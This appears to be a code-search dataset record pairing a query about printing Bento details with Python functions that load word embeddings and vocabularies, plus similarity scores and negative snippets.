"def __init__(self, model=\"glove.840B.300d.txt\", dictionary=\"words.txt\", pattern=\"^[a-z][a-z-]*[a-z]$\"):\n\n # Keep unique words matching pattern from file\n words = set()\n with open(dictionary, \"r\", encoding=\"utf8\") as f:\n for line in f:\n if re.match(pattern, line):\n words.add(line.rstrip(\"\\n\"))\n\n # Join words with model\n vectors = {}\n with open(model, \"r\", encoding=\"utf8\") as f:\n for line in f:\n tokens = line.split(\" \")\n word = tokens[0]\n if word in words:\n vector = numpy.asarray(tokens[1:], \"float32\")\n vectors[word] = vector\n self.vectors = vectors",
"def pickle_vectorizer(self, path='models/TFIDFVectorizer.pkl'):\n with open(path, 'wb') as f:\n pickle.dump(self.vectorizer, f)\n print(\"Pickled vectorizer at {}\".format(path))",
"def loadGLOVE(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with codecs.open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n tf.logging.info(\"Found {} out of {} vectors in Glove\".format(num_vectors, len(vocab)))\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]",
"def load_preprocessed(self):\n with open(self.words_vocab_file, 'rb') as f:\n self.word_to_id, self.unk_word_list = pickle.load(f)\n self.word_vocab_size = len(self.word_to_id)\n\n if self.unit != \"word\":\n with open(self.sub_vocab_file, 'rb') as f:\n if self.unit == \"char\":\n self.max_word_len = self.get_max_word_length(self.word_to_id) + 2\n self.char_to_id, self.unk_char_list, self.max_word_len = pickle.load(f)\n self.subword_vocab_size = len(self.char_to_id)\n elif self.unit == \"char-ngram\":\n self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, \\\n self.max_ngram_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.ngram_to_id)\n elif self.unit == \"morpheme\":\n self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, \\\n self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n elif self.unit == \"oracle\":\n self.morpheme_to_id, self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n else:\n sys.exit(\"Unknown unit\")",
"def make_embedding(path, words, indices):\n #root = '/'.join(path.split('/')[0:-1])\n #all_paths = [root+'/'+x for x in os.listdir(root)] #'/'.join(path.split('/')[0:-1]))\n #for path in all_paths:\n vec_path = 'data/'+path.split('/')[-1]+'_'+mode\n print(vec_path)\n if os.path.exists(vec_path+'.npy'):\n np_vecs = np.load(vec_path+'.npy')\n else:\n words_len = len(words)\n vecs = []\n if mode == 'word':\n f = load_model('wiki.en.bin')\n for i, w in enumerate(words):\n if mode == 'word':\n vec = f.get_word_vector(w)\n else:\n vec = eye[indices[w]]\n vecs.append(vec) \n if i % 10000 == 0:\n print(\"{} / {}\".format(i, words_len))\n np_vecs = np.asarray(vecs, dtype=np.int8)\n np.save(vec_path, np_vecs)\n return np_vecs",
"def _add_pre_trained_embedding(self):\n\n if self.embedding_type['type'] == 'glove':\n self.logging.info('use pre-trained glove word2vec')\n # a. load pre trained glove\n GLOVE_DIR = '../data/glove_pretrained/glove.6B'\n glove_suffix_name = 'glove.6B.' + str(self.embedding_size) + 'd.txt'\n import os\n import numpy as np\n\n embeddings_index = {}\n f = open(os.path.join(GLOVE_DIR, glove_suffix_name)) # 'glove.6B.100d.txt'))\n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n\n self.logging.info('')\n self.logging.info('Found %s word vectors.' % len(embeddings_index))\n\n # b. compute embedding matrix\n embedding_matrix = np.zeros((len(self.word_index) + 1, self.embedding_size))\n cnt = 0\n for word, i in self.word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector # words not found in embedding index will be all-zeros.\n else:\n # self.logging.info('token in train missing in word2vec: ' + str(word))\n cnt += 1\n self.logging.info('total tokens missing: ' + str(cnt) + ' / ' + str(len(self.word_index)))\n\n # c. build embedding layer\n from keras.layers import Embedding\n embedding_layer = Embedding(len(self.word_index) + 1,\n self.embedding_size,\n weights=[embedding_matrix],\n input_length=self.maxlen,\n trainable=False)\n\n elif self.embedding_type['type'] == 'gensim':\n self.logging.info('use pre-trained gensim word2vec')\n\n import gzip\n import gensim\n from keras.layers import Embedding\n import numpy as np\n\n # fname = '../data/word2vec_pretrained/motors/d_300_k_712904_w_6_e_60_v_motors'\n # fname = '../data/word2vec_pretrained/fashion/d_300_k_1341062_w_6_e_70_v_fashion'\n\n self.logging.info('load word2vec path: ' + str(self.embedding_type['path']))\n model = gensim.models.Word2Vec.load(self.embedding_type['path'])\n pretrained_weights = model.wv.syn0\n vocab_size, vector_dim = pretrained_weights.shape\n\n method = 3\n if method == 1:\n self.logging.info('word2vec attempt to fit into embedding layer - middle complex')\n # convert the wv word vectors into a numpy matrix that is suitable for insertion\n # into our TensorFlow and Keras models\n\n embedding_matrix = np.zeros((len(model.wv.vocab), vector_dim))\n for i in range(len(model.wv.vocab)):\n embedding_vector = model.wv[model.wv.index2word[i]]\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n embedding_layer = Embedding(input_dim=embedding_matrix.shape[0],\n output_dim=embedding_matrix.shape[1],\n # input_length=self.maxlen,\n weights=[embedding_matrix],\n trainable=False)\n elif method == 2:\n self.logging.info('word2vec simple embedding matching - simple complex')\n embedding_layer = Embedding(input_dim=vocab_size,\n output_dim=vector_dim,\n input_length=self.maxlen,\n weights=[pretrained_weights],\n trainable=False)\n elif method == 3:\n\n self.logging.info('word2vec match using word_index from keras tokenizer - as used in glove match above')\n # b. 
compute embedding matrix\n\n # sd = 1 / np.sqrt(len(self.word_index) + 1)\n # embedding_matrix = np.random.normal(0, scale=sd, size=(len(self.word_index) + 1, self.embedding_size))\n\n embedding_matrix = np.zeros((len(self.word_index) + 1, self.embedding_size))\n cnt = 0\n for word, i in self.word_index.items():\n if word in model.wv:\n embedding_vector = model.wv[word]\n embedding_matrix[i] = embedding_vector\n else:\n # self.logging.info('token in train missing in word2vec: ' + str(word))\n cnt += 1\n self.logging.info('total tokens missing: ' + str(cnt))\n\n\n # c. build embedding layer\n from keras.layers import Embedding\n embedding_layer = Embedding(len(self.word_index) + 1,\n self.embedding_size,\n weights=[embedding_matrix],\n input_length=self.maxlen,\n trainable=False)\n else:\n raise ValueError('unknown method value')\n\n else:\n raise ValueError('unknown embedding type')\n self.logging.info('create glove pre-trained embedding: ' + str(self.embedding_size))\n return embedding_layer",
"def load_word_vectors(filepath, word_index, vector_size):\n embedding_matrix = np.zeros((len(word_index) + 1, vector_size))\n\n fin = io.open(filepath, \"r\", encoding=\"utf-8\", newline=\"\\n\", errors=\"ignore\")\n n, d = map(int, fin.readline().split())\n\n for line in fin:\n tokens = line.rstrip().split(\" \")\n if tokens[0] in word_index:\n w = word_index[tokens[0]]\n embedding_matrix[w] = np.fromiter(map(float, tokens[1:]), \"float\")\n\n return embedding_matrix",
"def load_embedding(fname, vocab):\n model = gensim.models.Word2Vec.load(fname)\n embedding = model.wv # keep only the embedding dictionary\n del model # frees up memory used to store Word2Vec model\n\n k = len(embedding['a']) # dimension of embedding\n unknown_vec = lambda: np.random.normal(0,0.17,k) #TODO check these parameters\n \n restricted_embedding = {word: default_get(embedding, word, unknown_vec()) for word in vocab}\n return restricted_embedding",
"def _vector_mapping(self) -> dict:\n words = set()\n for file in os.listdir(self.processed_path):\n doc_path = f\"{self.processed_path}/{file}\"\n with open(doc_path, 'r') as f:\n text_words = f.readline().split()\n words = words.union(set(text_words))\n words = list(words)\n words.sort()\n\n return dict(zip(words, range(len(words))))",
"def loadw2v(embfile, embsize, myzipfile=None, maxvoc=None):\n word_to_ix = {}\n word_to_ix[constants.PAD_ITEM] = 0\n word_to_ix[constants.UNK_ITEM] = 1\n # fill padding word with zeros\n model = [[0.]*embsize]\n # fill unk word with random numbers\n model.append(np.random.normal(0,0.15,size=embsize).tolist())\n if myzipfile != None:\n zip = zipfile.ZipFile(myzipfile, 'r')\n f = zip.read(embfile).split(\"\\n\")\n else:\n #f = open(embfile, 'r')\n f = codecs.open(embfile, \"r\", \"utf-8\")\n ix = 2\n for line in f:\n if maxvoc!=None:\n if ix >= maxvoc:\n break\n splitLine = line.split()\n if(len(splitLine)>embsize+1):\n phrase_lst = splitLine[:-embsize]\n word = ' '.join(phrase_lst)\n embedding = [float(val) for val in splitLine[-embsize:]]\n word_to_ix[word] = ix\n model.append(embedding)\n ix += 1\n elif(len(splitLine)>2):\n word = splitLine[0]\n embedding = [float(val) for val in splitLine[1:]]\n word_to_ix[word]=ix\n model.append(embedding)\n ix += 1\n else:\n print(line)\n print(\"%d words loaded!\" % len(model))\n return word_to_ix, model",
"def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)",
"def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features",
"def construct_dict(self):\n i = 0\n self.word2idx = dict()\n fi = open(self.config.word_vec_fi_glove, 'r')\n\n for line in fi:\n self.word2idx[line.split(\" \")[0]] = i\n i += 1\n\n self.vocab_size = i\n self.write_dict()\n fi.close()",
"def load_words(): \r\n return lw.load_words()",
"def load_bin_vec(filename):\n w2v = {}\n with open(filename, 'r') as f:\n header = f.readline()\n vocab_size, emb_size = map(int, header.split())\n for line in f:\n cline = line.split()\n w2v[cline[0]] = np.array(cline[1:], dtype=np.float64)\n return w2v, emb_size, vocab_size",
"def load_word2vec_model():\n model = Word2Vec.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True, norm_only=True)\n return model",
"def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n print('vocabulary was created successfully!')\n return vocabulary",
"def load_embeddings(path):\r\n\r\n embeds = dict() # dictionary mapping words to vectors\r\n for line in open(path, encoding='utf-8'):\r\n row = line.strip().split('\\t')\r\n embeds[row[0]] = np.array(row[1:], dtype=np.float32)\r\n\r\n embeddings_dim = embeds[list(embeds)[0]].shape[0]\r\n\r\n return embeds, embeddings_dim",
"def load_embeddings(filename):\n count = 0\n matrix = []\n word_map = {}\n with open(filename, encoding=\"utf8\") as f:\n # with open(filename) as f:\n for line in f:\n line = line.strip()\n items = line.split()\n word = items[0]\n rest = items[1:]\n # print(\"word:\", word)\n word_map[word] = count\n count += 1\n\n rest = list(map(float, rest))\n matrix.append(rest)\n matrix = np.array(matrix)\n return word_map, matrix",
"def extract_word2vec(fichier, words_indices): \n \n word2vec={} #\n \n #\n with open(fichier,\"r\",encoding=\"utf-8\") as file:\n for line in file:\n line = line.replace(\" \\n\",\"\").split(\" \")\n # Lecture des informations du fichier\n # nombre de mots presents et nombre de features\n if len(line)==2 :\n nb_words=int(line[0])\n nb_feats=int(line[1])\n \n #\n else:\n if line[0] in words_indices:\n word, vec = line[0],np.array(line[1:])\n word2vec[word]=vec\n\n print(\"{} embbedings de taille {} pertinent parmi les {} du fichier\".format(len(word2vec), nb_feats, nb_words))\n\n return word2vec, nb_feats",
"def load_pretrained_words_data(embeddings_filename, vocab):\n words = dict()\n emb_dim = None\n with gzip.open(cached_path(embeddings_filename), 'rb') as embeddings_file:\n for line in embeddings_file:\n fields = line.decode('utf-8').strip().split(' ')\n if len(fields) == 0:\n continue\n word = fields[0]\n if emb_dim is None:\n emb_dim = len(fields) - 1\n if emb_dim < 10: # my pretrained file is poisonous 😭\n emb_dim = None\n else:\n assert emb_dim == len(fields) - 1, \"{}, {}\".format(emb_dim, len(fields) - 1)\n words.update({word: [float(i) for i in fields[1:]]})\n print(\"Embedding dim: {}\".format(emb_dim))\n tokens = vocab.get_index_to_token_vocabulary(\"tokens\")\n n_tokens = len(tokens)\n data = []\n for i in tokens:\n if tokens[i] in words:\n data.append(words[tokens[i]])\n else:\n data.append([0] * emb_dim)\n return torch.tensor(data), emb_dim",
"def load_vocab(self, fn):\n vocab = load_vocab(fn)\n self.vocab = vocab\n self.has_vocab = True",
"def loadData():\n\tprint \"Loading POS vectorized reviews\"\n\twith open(DATA_PATH, \"rb\") as data_file:\n\t\tdata = cPickle.load(data_file)\n\treturn data",
"def load_word2vec_en_pretrained():\r\n log.info(\"Load W2V Model\")\r\n model = api.load(\"glove-wiki-gigaword-50\")\r\n return PreTrainedGensimEN(model)",
"def load_target_vocab(self):\n vocab = [line.split()[0] for line in open(os.path.join('preprocessed', 'all_vocab.txt'), 'r').read().splitlines()]\n self.word2idx = {word: idx for idx, word in enumerate(vocab)}\n self.idx2word = {idx: word for idx, word in enumerate(vocab)}\n self.vocab_size = len(self.word2idx)",
"def load_pre_trained_vector_array(pre_trained_vectors_file, normalize=True):\n vectors = {}\n word_to_index = {}\n with gzip.open(pre_trained_vectors_file, 'rt', encoding='utf8', errors='raise') as file_in:\n word_index = 0\n for line in file_in:\n values = line.rstrip().split(' ')\n word = values[0]\n vectors[word] = [float(x) for x in values[1:]]\n if word != '<unk>':\n word_to_index[word] = word_index\n word_index += 1\n index_to_word = {i: w for w, i in word_to_index.items()}\n return _get_vectors(vectors, word_to_index, index_to_word, normalize), word_to_index, index_to_word",
"def load_glove(self, path, vocab_size=None, dim=None, reserve_zero=True, reserve_oov_token=True):\n\n # Infer vocab size by reading number of lines\n if vocab_size is None:\n vocab_size = 0\n with open(path, 'r') as f:\n for line in f:\n vocab_size += 1\n\n # Infer vector dim by reading a single line\n if dim is None:\n with open(path, 'r') as f:\n dim = len(f.readline().split(u' ')) - 1\n\n words = []\n\n self.allow_oov = reserve_oov_token\n self.reserve_zero = reserve_zero\n\n if self.reserve_zero:\n words.append('__ZERO__')\n if self.allow_oov:\n words.append('__OUT_OF_VOCAB__')\n self.oov_index = len(words) - 1\n\n self._matrix = np.zeros((vocab_size+len(words), dim))\n # Assign random vector for OOV token if it exists\n if \"__OUT_OF_VOCAB__\" in words:\n self._matrix[self.oov_index] = np.random.randn(dim, )\n\n update = words.append # Speedup\n with open(path, 'r') as f:\n for i in tqdm(range(len(words), self.matrix.shape[0])):\n split = f.readline().split(u' ', 1)\n update(split[0])\n self._matrix[i] = np.fromstring(split[1], 'f', sep=u' ')\n\n self.vocab = words",
"def glove_embedding(self, texts, file):\n self.embedding_dict = dict()\n glove_file = open(file, encoding='utf-8')\n for line in glove_file:\n word_vector = line.split()\n word = word_vector[0]\n word_vector_arr = np.asarray(word_vector[1:], dtype='float32')\n self.embedding_dict[word] = word_vector_arr\n glove_file.close()\n \n i = 0\n with pgb.ProgressBar(max_value=len(texts)) as bar:\n for text in texts:\n vec = []\n text = text.split()\n for t in text:\n try:\n vec.append(self.embedding_dict[t.lower()])\n except KeyError:\n pass\n ## There are no matched words\n if len(vec) == 0:\n print(\"len 0 vec\")\n self.word_vec.append(np.zeros((100)))\n else:\n #print(np.array(vec))\n #print(np.array(vec).shape)\n sentence = self.sentence_vec(np.array(vec))\n #print(sentence)\n #print(sentence.shape)\n self.word_vec.append(sentence)\n i += 1\n bar.update(i)\n self.word_vec = np.array(self.word_vec)\n print(self.word_vec.shape)",
"def vectorize(self,clean_path):\n \n #load pretrained embedding model (GloVe)\n glove = spacy.load('en_core_web_lg')\n #extract unique words (aka vocabulary)\n unique_words = set()\n for d in self.docs: \n txt = d.text\n doc = glove(txt)\n for word in doc: \n if word.has_vector:\n unique_words.add(word.text)\n #change set to list type\n unique_words = list(unique_words)\n #save vector representation\n word_vectors = np.array([glove(word).vector for word in unique_words if glove(word).has_vector])\n #index vectors by corresponding word \n corpus_vectors = pd.DataFrame(word_vectors, index=unique_words)\n with open(clean_path + 'corpus_vectors.pkl', 'wb') as f:\n pickle.dump(corpus_vectors,f)\n self.vectors = corpus_vectors\n print('Saved embedding vectors.')\n return",
"def load_embeddings(self, str_file):\n\n with open(str_file, 'rb') as f_read:\n self.embeddings_entity = pickle.load(f_read)\n self.embeddings_relation = pickle.load(f_read)\n self.dict_paras = pickle.load(f_read)"
] | [
"0.7791548",
"0.72534555",
"0.72064674",
"0.7057689",
"0.7057665",
"0.7002823",
"0.6931613",
"0.68834174",
"0.6871142",
"0.6848353",
"0.6788099",
"0.67114586",
"0.66740996",
"0.6664656",
"0.66422987",
"0.66346234",
"0.6607083",
"0.6605387",
"0.65846086",
"0.65806603",
"0.6566823",
"0.65596646",
"0.6506629",
"0.6472431",
"0.64723456",
"0.6464267",
"0.6462529",
"0.6442341",
"0.64398634",
"0.64314306",
"0.6415282",
"0.6412817",
"0.64055413",
"0.6397267",
"0.63649577",
"0.6359486",
"0.6357812",
"0.630708",
"0.6306844",
"0.6306844",
"0.6287034",
"0.6284496",
"0.6282652",
"0.62809384",
"0.62775403",
"0.627609",
"0.627609",
"0.6248722",
"0.62371",
"0.62332183",
"0.62292427",
"0.6224259",
"0.6220833",
"0.62112397",
"0.62043905",
"0.6183441",
"0.6177345",
"0.6148398",
"0.6138987",
"0.61367595",
"0.6133708",
"0.61315227",
"0.6128918",
"0.6125864",
"0.6121823",
"0.61214197",
"0.6114165",
"0.6109445",
"0.60953474",
"0.60933805",
"0.60850745",
"0.6081149",
"0.60749274",
"0.6057515",
"0.6052783",
"0.60507745",
"0.60471046",
"0.60435355",
"0.6039067",
"0.603368",
"0.60328203",
"0.60221773",
"0.6013095",
"0.60007405",
"0.5999903",
"0.5999048",
"0.5997936",
"0.59918404",
"0.5977796",
"0.5969003",
"0.59505683",
"0.5937666",
"0.59337145",
"0.5930212",
"0.5927906",
"0.592368",
"0.5921867",
"0.591842",
"0.5905716",
"0.58937156"
] | 0.68163615 | 10 |
Print Bento details by providing the bento_tag. \b | def get(bento_tag: str, output: str) -> None: # type: ignore (not accessed)
bento = bento_store.get(bento_tag)
if output == "path":
console.print(bento.path)
elif output == "json":
info = json.dumps(bento.info.to_dict(), indent=2, default=str)
console.print_json(info)
else:
info = yaml.dump(bento.info, indent=2, sort_keys=False)
console.print(Syntax(info, "yaml")) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def print_tags():\n for tag in Tag.query.all():\n print tag.__repr__()",
"def __gitDescribeTag(self):\n self.vcs.gitDescribe(self.project.getProjectPath(), [])",
"def show_target(self, target):\n print \" \" + repr(target.subject) \\\n + \" \" + target.meaning \\\n + \" \" + target.verb \\\n + \" \" + repr(target.object)",
"def print(self):\r\n self.print_avec_separateur()",
"def printme(self, line):\n self.otag.printme(line)",
"def print_cwb(document, tag='<s>'):\n\n doc = NLP(document)\n for sentence in doc.sents:\n print(tag)\n\n sent = NLP(sentence.text)\n for token in sent:\n print('{word}\\t{pos}\\t{lemma}'.format(\n word=token.text,\n pos=token.pos_,\n lemma=token.lemma_))\n\n print(tag.replace('<', '</'))",
"async def info(self, ctx: \"IceTeaContext\", *, otag: TagConverter):\n tag: models.Tag = otag\n if not tag.alias:\n embed = discord.Embed(description=f\"{ctx.message.guild.name} ``{tag.title}`` tag information\")\n user = ctx.guild.get_member(tag.author)\n embed.set_author(name=user.display_name, icon_url=user.avatar_url)\n embed.add_field(name=\"Tag name\", value=tag.title)\n embed.add_field(name=\"Amount used\", value=str(tag.count))\n embed.timestamp = tag.created\n await ctx.send(embed=embed)\n else:\n embed = discord.Embed(description=f\"{ctx.message.guild.name} ``{tag.title}`` alias information\")\n user = ctx.guild.get_member(tag.author)\n embed.add_field(name=\"Author\", value=user or \"Unknown\")\n embed.add_field(name=\"Amount used\", value=str(tag.count))\n embed.timestamp = tag.created\n await ctx.send(embed=embed)",
"def book_info(self):\n print(\"ID : \", self.ID,\n \"\\nName : \", self.name,\n \"\\nAuthor : \", self.author,\n \"\\nGenre : \", self.genre,\n \"\\nPrice : \", self.price,\n \"\\nQuantity of this book : \", self.quantity)",
"def pretty_print_entity(entity: tg.tl.TLObject) -> str:\n\n return bprint.bprint(entity, stream=str, skip_predicate=_bprint_skip_predicate)",
"def get(self, bento_name, bento_version):",
"def _print(self, *args, **kwargs) -> None:\n # Only print in verbose mode\n if self._verbose:\n arglist = list(args)\n arglist[0] = f\"[buddy-{self._experiment_name}] {args[0]}\"\n print(*arglist, **kwargs)",
"def list_bentos(bento_name: str, output: str) -> None: # type: ignore (not accessed)\n bentos = bento_store.list(bento_name)\n res = [\n {\n \"tag\": str(bento.tag),\n \"path\": display_path_under_home(bento.path),\n \"size\": human_readable_size(calc_dir_size(bento.path)),\n \"creation_time\": bento.info.creation_time.astimezone().strftime(\n \"%Y-%m-%d %H:%M:%S\"\n ),\n }\n for bento in sorted(\n bentos, key=lambda x: x.info.creation_time, reverse=True\n )\n ]\n\n if output == \"json\":\n info = json.dumps(res, indent=2)\n console.print(info)\n elif output == \"yaml\":\n info = yaml.safe_dump(res, indent=2)\n console.print(Syntax(info, \"yaml\"))\n else:\n table = Table(box=None)\n table.add_column(\"Tag\")\n table.add_column(\"Size\")\n table.add_column(\"Creation Time\")\n table.add_column(\"Path\")\n for bento in res:\n table.add_row(\n bento[\"tag\"],\n bento[\"size\"],\n bento[\"creation_time\"],\n bento[\"path\"],\n )\n console.print(table)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n print(\"\\tLocation: {}\".format(group.location))\n print(\"\\tTags: {}\".format(group.tags))\n if hasattr(group, 'status'):\n print(\"\\tStatus: {}\".format(group.status))\n if hasattr(group, 'state'): # Site\n print(\"\\tStatus: {}\".format(group.state))\n if hasattr(group, 'properties'):\n print_properties(group.properties)\n print(\"\\n\\n\")",
"def print_obs(self,obs):\n print(obs)",
"def export(bento_tag: str, out_path: str) -> None: # type: ignore (not accessed)\n bento = bento_store.get(bento_tag)\n out_path = bento.export(out_path)\n logger.info(\"%s exported to %s.\", bento, out_path)",
"def _show(self, indent = 0):\n print(\" \"*indent, \"Name:\", self.name)\n print(\" \"*indent, \"Description:\", self.description)",
"def print_verbose(self) -> None:\n print(self)\n if self.meta is not None:\n print(self.meta.__repr__())",
"def Print(self):\n\n\t\tif self.verbose:\n\n\t\t print (\"\\033[1m[HEADER]\\033[0m\")\n\t\t print (\"code:\\t\\t%s\" % self.kod)\n\t \tprint (\"version:\\t%s\" % self.ver)\n\t\t print (\"date and time:\\t%s\" % self.probid)\n\t\t print (\"dump number:\\t%s\" % self.knod)\n\t \tprint (\"number of histories:\\t%s\" % self.nps)\n\t\t print (\"number of pseudorandom numbers used:\\t%s\" % self.rnr)\n\t\t print (\"title: %s\" % self.title)\n\n\t\t if self.ntal>1:\n\t\t\t\tprint self.ntal, 'tallies:', self.ntals\n\t \telse:\n\t\t\t\tprint self.ntal, 'tally:', self.ntals\n\n\n\t\t if self.npert != 0:\n\t\t\t\tprint(\"number of perturbations: %s\" % self.npert)",
"def print_object_details(obj: object) -> None:\n print_section(obj, 'Type', print_type)\n print_section(obj, 'Documentation', print_documentation)\n print_section(obj, 'Attributes', print_attributes)\n print_section(obj, 'Methods', print_methods)\n print_section_delimiter()",
"def verbose(self, block: Block):\n print('\\n\\n==============================')\n print('Hash:\\t\\t', block.hash.hexdigest())\n print('Previous Hash:\\t', block.previous_hash.hexdigest())\n print('Nounce:\\t\\t', block.nonce)\n print('Data:\\t\\t', block.data)\n print('\\n\\n==============================')",
"def print_element(self):\n print(\"{selector}\\n{el_path}\\n{selector}\\n{el_source}\\n{selector}\\n\\n\"\n \"\".format(selector=\"--------\",\n el_path=self.save_path,\n el_source=self.text))",
"def print_operation(operations):\n for operation in operations:\n print ' ',\n change_color_by_tag(operation)\n if operation['ExtAttributes']:\n print_extattributes_of_member(operation['ExtAttributes'])\n print operation['Type'],\n if operation['Arguments']:\n print operation['Name'],\n print_argument(operation['Arguments'])\n else:\n print operation['Name']",
"def __str__(self):\n\n return \"[b:{} t:{}]\".format(self.obtem_bag_pass(), self.obtem_ciclo_in())",
"def displayhook(self, obj):\n # reproduce the behavior of the standard displayhook, not printing None\n if obj is not None:\n print >> self.stdout, repr(obj)",
"def __repr__(self):\n if self.bo is None:\n s = \"<BOFeature:%s not attached to bo!>\" % (self.name) \n else:\n s = \"<BOFeature:%s attached to %s>\" % (self.name, self.bo)\n return(s)",
"def print_item(group):\n print(\"\\tName: {}\".format(group.name))\n print(\"\\tId: {}\".format(group.id))\n print(\"\\tLocation: {}\".format(group.location))\n print(\"\\tTags: {}\".format(group.tags))\n if hasattr(group, 'properties'):\n print_properties(group.properties)",
"def print(self):\n size_bid = len(self.bid)\n size_offer = len(self.offer)\n print(\"Book[%s]: %d bids, %d offers --> mid @ %f\" % (self.security,\n size_bid, size_offer, self.mid()))\n print(\"{0: ^32} | {1: ^32}\".format(\"bid\", \"offer\"))\n print(\"{0:^10},{1:^10},{2:^10} | {3:^10}, {4:^10}, {5:^10}\".format(\n \"count\", \"qty\", \"price\", \"price\", \"qty\", \"count\"))\n\n empty_level = OrderBookLevel(\"-\", \"-\", \"-\")\n for i in range(max(size_bid, size_offer)):\n bid = self.bid[-(i+1)] if i < size_bid else empty_level\n offer = self.offer[i] if i < size_offer else empty_level\n print(\"{0:^10},{1:^10},{2:^10} | {3:^10}, {4:^10}, {5:^10}\".format(\n bid.order_count, bid.qty, bid.price, offer.price, offer.qty, offer.order_count))",
"def bbs_show_banner(tn, short = True):\n lines = cmd.lban(tn, short_banner = short)\n for line in lines:\n print(filter_tags(line))",
"def tagger():",
"def print(self):\n self.print_avec_separateur(\" \")",
"def print_state(self):\n print(self.type,\n self.persons[0].identifier,\n self.persons[1].identifier)",
"def debug_print(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n\n print('\\nPosition')\n print(self.tetromino.position())\n print('\\nBlock coordinates')\n print(self.tetromino.block_coordinates())\n print('\\nBoard')\n print(self.board)\n print('\\nBoard heights')\n print(self.board.get_height())\n\n if self.pause:\n print('\\nPaused')",
"def status(self, indent=0):\n spaces = ' ' * (indent + 2)\n try:\n print(\"%s%s:\" % (' ' * indent, self.__class__.__name__))\n\n flags = []\n if self.__generated:\n flags.append(\"generated\")\n if self.air is None:\n flags.append(\"deleted\")\n\n flagStr = \"\"\n if len(flags) > 0:\n flagStr = \" (%s)\" % (\" \".join(flags))\n\n print(\"%sfrom DistributedObject doId:%s, parent:%s, zone:%s%s\" % (\n spaces, self.doId, self.parentId, self.zoneId, flagStr))\n except Exception as e:\n print(\"%serror printing status %s\" % (spaces, e))",
"def _print_custom(self):\n pass",
"async def get_pretty_vetoes(self) -> typing.List[str]:\n\n open_bills = await self.bot.db.fetch(\n \"SELECT id, name, link, link FROM bill WHERE is_vetoable = true AND status = $1 ORDER BY id\",\n models.BillPassedLegislature.flag.value,\n )\n\n if not open_bills:\n return []\n\n pretty_bills = []\n b_ids = []\n b_hyperlinks = []\n\n for record in open_bills:\n b_ids.append(f\"Bill #{record['id']}\")\n b_hyperlinks.append(\n f\"=HYPERLINK(\\\"{record['link']}\\\"; \\\"{record['name']}\\\")\"\n )\n pretty_bills.append(\n f\"Bill #{record['id']} - [{record['name']}]({record['link']})\"\n )\n\n exported = [\n f\"Export of Veto-able Bills -- {discord.utils.utcnow().strftime('%c')}\\n\\n\\n\",\n \"----- Veto-able Bills -----\\n\",\n ]\n\n exported.extend(b_ids)\n exported.append(\"\\n\")\n exported.extend(b_hyperlinks)\n\n link = await self.bot.make_paste(\"\\n\".join(exported))\n\n if link:\n pretty_bills.insert(\n 0,\n f\"[*View this list in Google Spreadsheets formatting for easy copy & pasting*]({link})\\n\",\n )\n\n return pretty_bills",
"def br(cls):\n term_width = get_terminal_width()\n\n if hasattr(cls, 'info'):\n cls.info('-' * term_width)\n else:\n print('-' * term_width)",
"def Dragon_Blade(self):\t\t\n\t\tprint(self.name.Title() + \" Dragon blade!\")",
"def debug_print(self):\n print self.title\n print self.storyline\n print self.poster_image_url\n print self.trailer_youtube_url\n print \"------\"",
"def dump(self, tag=None):\n return self.dump_to(sys.stdout.buffer, tag=tag)",
"def __repr__(self):\n price_trailing_diff = self.get('price_trailing_diff')\n if self.bo is None:\n s = \"<BOFeature:%s not attached to bo!>\" % (self.name) \n else:\n s = \"<BOFeature:%s price_diff=%s attached to bo#%s>\" % (self.name, price_trailing_diff, self.bo.ticket)\n return(s)",
"def biv_info(biv_id):\n b = biv.load_obj(biv_id)\n print(str(b))\n for k in b.__table__.columns:\n k = k.name\n print('{:>24} = {}'.format(k, getattr(b, k)))",
"def print_cell_information(obj_ase_cell):\n # print the lattice vectors\n print('a1=',obj_ase_cell.cell[0,:])\n print('a2=',obj_ase_cell.cell[1,:])\n print('a3=',obj_ase_cell.cell[2,:])\n for i,a in enumerate(obj_ase_cell):\n print(i,a.symbol,a.position)",
"def detailedInfo(cls):\n return 'tbd'",
